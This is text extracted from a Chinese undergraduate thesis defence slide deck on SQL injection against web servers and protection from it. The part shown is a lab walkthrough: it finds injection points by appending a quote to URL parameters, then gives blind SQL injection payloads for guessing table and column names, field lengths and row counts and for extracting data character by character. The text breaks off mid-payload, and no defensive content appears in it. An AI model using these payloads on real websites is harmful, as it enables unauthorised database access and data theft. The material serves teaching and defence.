基于web服务器SQL的入侵与防护本科毕业论文答辩演示课件文.pptVIP

基于web服务器SQL的入侵与防护;CONTENTS;web服务器SQL注入;搜寻网站SQL注入点 尝试几个有传入参数的页面，逐个测试是否有SQL注入漏洞，识别方法为：把网址栏的ID=***加个号“’”，如果提示表达式错误，表示有漏洞可注入，另外，通过这个方式可以得到程序所用的数据库类型。 点击北京链接会发现地址栏中出现了变量，直接在后面加入“’”返回错误，初步判断有注入漏洞。 ;;破解的流程如下：判断数据库表名—?判断数据库列名—判断列名字段个数—字段猜解 下面沾出实验的五个语句，然后慢慢带着大家破解 测试数据库中字段长度： /index.asp?city=bjand (select top 1 len(tel)from info)10and1=1 猜测数据库中表 ?and?exists?(select?*?from?admin)?and?1=1 ;猜测数据库中字段子列 ?and?exists?(select?admin?from?info)?and?1=1 利用二分法猜测数据库中的信息条数 ?and?(select?Count(1)?from?[info]?where?1=1)?between?0?and?100?and?1=1 猜测数据库中值得代码 /index.asp?city=bjand (select top 1 asc(mid(city,1,1))